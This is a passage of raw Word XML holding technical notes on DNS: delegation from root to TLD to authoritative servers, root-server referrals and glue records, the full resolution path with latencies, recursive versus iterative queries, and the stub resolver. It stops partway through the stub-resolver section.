    <w:p w14:paraId="1251DB43" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 The Delegation Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69554240" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Each level of the hierarchy delegates authority to the next:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB71D6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="712"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Root servers</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> know: "For .com, ask Verisign's TLD servers."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAAD764" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="712"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLD servers (.com)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> know: "For example.com, ask these authoritative nameservers."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5415D717" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="712"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authoritative nameservers (for example.com)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> know: "For www.example.com, the IP is 93.184.216.34."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E97D4C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nobody holds the complete map.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Each layer only knows about its immediate children and who to delegate to. This is what makes DNS scalable to billions of names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C78B4AF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Root Servers — The Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB882E0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13 logical root server addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (a.root-servers.net through m.root-servers.net):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A81BB64" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="713"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Not 13 physical machines — each is anycast, with hundreds of instances worldwide (1,700+ total instances as of 2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFEDA72" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="713"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>They serve the root zone file (~2MB, containing delegations for all TLDs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750F2F90" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="713"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Handle ~100,000+ queries/second each.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A09395" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="713"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Operated by 12 independent organizations (ICANN, Verisign, NASA, US Army, RIPE, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454AA71A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why 13?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Historical constraint: a DNS response must fit in a single 512-byte UDP packet (original spec). 13 NS records with IPv4 addresses was the maximum that fit. With EDNS0 (larger packets), IPv6 addresses are also included.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF96078" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How root servers respond:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F6B523" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>A query to a root server for www.example.com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8FB583" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Root server doesn't know the answer. It responds with a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>referral:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53334C76" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72093E07" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>;; AUTHORITY SECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679D99B6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>com.    172800  IN  NS  a.gtld-servers.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241ECF09" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>com.    172800  IN  NS  b.gtld-servers.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF93FAB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C7431" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="25D232F3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>;; ADDITIONAL SECTION (glue records):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF96222" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>a.gtld-servers.net.  172800  IN  A  192.5.6.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79365B42" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>"I don't know, but here's who handles .com — and here's their IP (glue record) so you can reach them."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3557F9EC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="3620D218">
          <v:rect id="_x0000_i3478" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1BB1D2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. DNS Resolution — The Complete Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40818C06" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 The Full Resolution Path (Iterative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E587A3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>When you type www.example.com in a browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349160AA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48363B8A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Step 1: Browser cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6396F88B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">        ↓ (miss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C9DD6A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Step 2: OS resolver cache (stub resolver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FFB15" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">        ↓ (miss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39902AB9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Step 3: Recursive resolver (ISP or public DNS like 8.8.8.8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3C9BB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">        ↓ (miss in resolver's cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741EF28E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Step 4: Resolver queries root server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624C39CE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">        ← Root responds: "Ask .com TLD servers" (referral)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152765E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Step 5: Resolver queries .com TLD server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7393C884" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">        ← TLD responds: "Ask example.com's authoritative NS" (referral)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07805E07" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Step 6: Resolver queries example.com's authoritative nameserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A3DF93" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">        ← Authoritative responds: "www.example.com = 93.184.216.34" (answer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C4EA9C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Step 7: Resolver caches the result, returns to OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74694533" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Step 8: OS caches, returns to browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0590B044" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Step 9: Browser caches, initiates TCP connection to 93.184.216.34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC6C233" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Typical latencies (cold cache, worst case):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612"/>
        <w:gridCol w:w="1463"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="24321FD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14D96C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Step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E5D53B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="5614FBA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FC21B2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Root query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A5720C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>5–30ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="2F998D1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07A9A2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>TLD query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0395E1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>10–50ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="06A0B31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C76A1A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Authoritative query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3E35BE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>10–100ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="054A6B7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040107" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Total cold resolution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A84ACC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>25–180ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1309C1FF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With warm caches (typical):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78642096" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Most of these are cached. The resolver doesn't query root servers for every request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3443093D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="714"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Root and TLD referrals are cached for days (high TTL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC62E9F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="714"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Popular domains are cached at the resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF74BD9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="714"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Typical cached resolution: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0–5ms</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (just a local cache lookup).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D25A59C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Recursive vs. Iterative Resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284F5386" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recursive resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06440D48" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="715"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The client asks the recursive resolver: "Give me the final answer."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE2F36" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="715"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The resolver does ALL the work (querying root, TLD, authoritative) and returns the final answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A262354" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="715"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The client makes ONE query and waits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342618F8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Iterative resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498B890" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="716"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The resolver asks each server in turn. Each server either answers directly or gives a referral.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ED3750" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="716"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The resolver follows referrals itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646FF172" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="716"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>This is how the recursive resolver talks to authoritative servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358E8625" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The split:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BD0A37" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="717"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client → Recursive Resolver: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>recursive</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (client expects a complete answer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3DB279" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="717"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Recursive Resolver → Root/TLD/Authoritative: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>iterative</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (resolver follows referrals)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF4CBA2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.3 The Stub Resolver (Client Side)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934F378" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The "stub resolver" is the minimal DNS client in your OS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D38D4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="718"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it does:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Takes the application's request (e.g., getaddrinfo("www.example.com")), sends a query to the configured recursive resolver, and returns the answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A0EFA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="718"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> /etc/resolv.conf on Linux (nameserver IP), DHCP-assigned, or hardcoded (e.g., 8.8.8.8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748D9796" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="718"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>It does NOT do iterative resolution itself.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
